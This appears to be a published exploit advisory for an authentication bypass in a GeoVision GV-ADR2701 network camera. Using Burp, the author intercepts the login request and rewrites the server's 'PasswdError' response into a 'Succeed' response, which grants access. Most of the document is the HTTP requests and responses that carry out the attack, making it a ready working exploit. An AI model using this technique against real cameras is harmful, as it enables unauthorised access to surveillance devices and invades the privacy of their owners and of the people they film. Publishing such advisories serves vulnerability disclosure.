1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass # Device name: GV-ADR2701 # Date: 26 December , 2020 # Exploit Author: Chan Nyein Wai # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Firmware Version: V1.00_2017_12_15 # Tested on: windows 10 # Exploitation 1. Capture The Login Request with burp, Do intercept request to response Request: </code><code> PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1 Host: 10.10.10.10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA== Content-Length: 46 Origin: http://10.10.10.10 Connection: close Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0 Cookie: isAutoStartVideo=1 {"UserName":"admin","Password":"0X]&0D]]05"} </code><code> 2. The following is the normal response when you login to the server. </code><code> HTTP/1.1 200 Ok Content-Length: 170 Content-Type: text/plain Connection: close X-Frame-Options: SAMEORIGIN { "Response": { "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", "CreatedID": -1, "StatusCode": 460, "StatusString": "PasswdError", "Data": "null" } } </code><code> By editing the response to the following, you can successfully log in to the web application. </code><code> HTTP/1.1 200 Ok Content-Length: 170 Content-Type: text/plain Connection: close X-Frame-Options: SAMEORIGIN { "Response": { "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", "CreatedID": -1, "StatusCode": 0, "StatusString": "Succeed", "Data": "null" } } </code><code> |